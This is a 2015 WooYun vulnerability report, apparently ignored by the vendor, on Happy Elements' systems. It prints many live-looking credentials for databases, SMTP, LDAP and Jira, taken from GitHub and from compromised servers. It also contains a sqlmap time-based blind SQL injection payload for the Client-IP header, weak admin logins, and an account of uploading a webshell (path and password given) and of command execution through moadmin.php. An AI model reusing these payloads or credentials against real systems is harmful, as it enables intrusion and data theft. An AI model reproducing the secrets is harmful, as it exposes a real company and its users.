当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143807

漏洞标题:乐元素多处安全漏洞打包以及多个shell(数据可直接泄漏)

相关厂商:happyelements.cn

漏洞作者: mango

提交时间:2015-09-29 11:24

修复时间:2015-10-12 20:26

公开时间:2015-10-12 20:26

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-29: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

女朋友非常喜欢玩开心消消乐~~还非常喜欢小黄鸡的抱枕~~~求送个~~~~

详细说明:

先说说 github上面的信息泄露吧
https://github.com/jiangkunwei/dc/blob/9778fb5f182a0dde6f36cf95bdfc8279eb74ec88/config/config.php

),
	//mysql config
	'mysqlConfig' => array (
		'host' => 'da.happyelements.com',
		'dbuser' => 'alex',
		'dbpass' => 'myanotherdatacenter',
		'dbname' => array (
			'diamond' => 'da_uiue',
			'stat' => 'stat',


支持外联哦~

WOBAZW{3RAZA~%1%WCRIKA4.png


https://github.com/gaitian/project/blob/97d02946eab3e3f18aeef6f97702eb9c0295748e/trunk/protected/config/params.php

'CharSet' => 'UTF-8',
		//'Encoding' => 'BASE64',
		'SMTPAuth' => true,
		'SMTPSecure' => 'tls',
		'SMTPDebug' => 1,
		'Host' => 'smtp.office365.com',
		'Port' => '587',
		'Username' => 'it_admin@happyelements.com',
		'Password' => 'tlt1234$',


4XPRWFKC1S6[D2D%Z@T732U.png


再说个注入问题
http://fansclub.happyelements.com:80/fans/qa.php
这个是开心消消乐APP里面的链接 是客服里面的常见问题
Client-IP 存在注入哦

sqlmap identified the following injection points with a total of 106 HTTP(s) requests:
---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ' AND (SELECT * FROM (SELECT(SLEEP(5)))PLSm) AND 'wOlE'='wOlE
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.12
available databases [6]:
[*] bb
[*] community
[*] fans
[*] information_schema
[*] mg
[*] wx


K`}LB7V`F~124MG}K0KR2QT.png


其中 还影响 http://ff.happyelements.com/index.php/admin/nodes admin 1234qwer!

)1[SYR]G7P)Z%I8MCQ[QFEK.png

漏洞证明:

来说说getshell
http://admin.happyelements.net/blog/ 是wp模版 存在弱口令 admin 123456

)5@){N6OI)5(2_@@QX2HSXI.png


通过上传webshell获得权限
http://admin.happyelements.net/blog/wp-content/uploads/2015/09/0.php 密码a

C2BFZRB}IBLB@@M3C]_T[MC.png


在这 翻到一些数据哦

peng.shan 111111
            zhangli
            123456
            12345678
            1234qwer!
cacti admin 1qaz!@#$
            111111
            12345678
            1234qwer!

这个基本上是管理员通用的密码咯
还发现了ldap 

define("LDAP_SERVER","10.130.130.10");    //120.56");
define("LDAP_PORT",389);
define("AUTH_USER",'hec\ad_operator');
define("AUTH_PASS",'happy-fish_it123');
define("BASE_DN","OU=hec,DC=hec,DC=intra");


("odbc:Driver=FreeTDS;Server=10.130.150.171;Port=1433;Database=middata2015;Tds_version=7.0;Uid=sa;Pwd=sa;");

'url' => 'http://leave.happyelements.net/',
	'smtp' => array (
		'CharSet' => 'UTF-8',
		'Encoding' => 'BASE64',
		'SMTPAuth' => true,
		'SMTPSecure' => 'TLS',
		'Host' => 'mail.happyelements.com',
		'Port' => '587',
		'Username' => 'leave_admin',
		'Password' => '1234qwer!',
	),


又发现帐号~~登陆一下试试

@3U_JJS0TU3R2QA9LDNB`5C.png


~$VF4VDF29WE(06}[LO737X.png


ULR`D8B10N0EH5)OSR6DVPD.jpg


WOCUB]VRO0Z9MA{H[F@DB{B.jpg


YCDB8Q%VWZQP1)HV2LPWEQ8.png


第二个shell
http://fc.happyelements.com/
是客服系统
存在moadmin.php 之前就被爆两个命令执行

6QVAH18SP$`]8D%{0$EZ3AY.png


%%AZ]`(Y[77YL$XIQO9@2@O.png


成功shell
下面是一些数据哦~

'From'          => 'support_user@happyelements.com',
        'FromName'      => 'SupportUser',
        'Username'      => 'support_user@happyelements.com',
        'Password'      => 'Hemail@2015',
        'Host'          => 'smtp.office365.com',
   'host'          => '10.20.53.15',
    'user'          => 'jira_cc',
    'pass'          => 'CC_to_Jira#',
    'name'          => 'jiradb',
    'charset'       => 'utf8',
    'source'        => 'jira_us',return array (
		'jira_cn' => array(
		'host'          		=> '50.22.154.190',
		'user'          		=> 'gsp_fc_db',
		'pass'         	 		=> 'gsp_fc_1234qwer!',
		'name'         	 		=> 'jiradb',
		'charset'       		=> 'utf8',
		'source'        		=> 'jira_us',			//key
		'api'           		=> 'http://fc.happyelements.com/jira/api',
		
		'domain'        		=> 'http://jira.us.happyelements.com:8888/rest/jconnect/service/issue/comment/',	//绂忔澗鏂版敼鐨?
		
		'pay_log'       		=> 'http://w9.fortuna.happyelements.com/getUserLastPayLog.jsp',
    'api'           => 'http://fc.happyelements.com/jira/api',
    'domain'        => 'http://jira.us.happyelements.com:8888',
    'pay_log'       => 'http://w9.fortuna.happyelements.com/getUserLastPayLog.jsp',
);
*/
    /*
    'paopaocat' => array(
        'username'  => 2202410931,
        'passwd'    => 'ppmmp@2013',
        'token'     => 'happyfishFC',
        ),
     */
    'happyfish'  => array(
        'username'  => 2506103974,
        'passwd'    => 'happyfishmp2012',
        'token'     => 'happyfishFC',
    ),
);
    'server'            =>'http://jira.us.happyelements.com:8888/rpc/soap/jirasoapservice-v2?wsdl',
    'username'          =>'fcuser1',
    'password'          =>'1234qwer!',
);define('UC_DBHOST', '10.130.100.101');
define('UC_DBUSER', 'bbs_fish_tw');
define('UC_DBPW', 'bbsfishtw');
define('UC_DBNAME', 'bbs_tw');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`bbs_tw`.tw_ucenter_');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', '4eW1V09726Mb06f3N2a5de3enbj0N137n7i2Q6lab6p6q4l9a3Z8P6X91984n89d');
define('UC_API', 'http://bbs.hfish.tw/uc_server');
define('UC_APPID', '1');
define('UC_IP', '');
define('UC_PPP', 20);


support_user 可以登录的 我就不帖图片了~

修复方案:

求抱枕~~我送妹子~~~~~求抱枕砸死我~~~

版权声明:转载请注明来源 mango@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-12 20:26

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无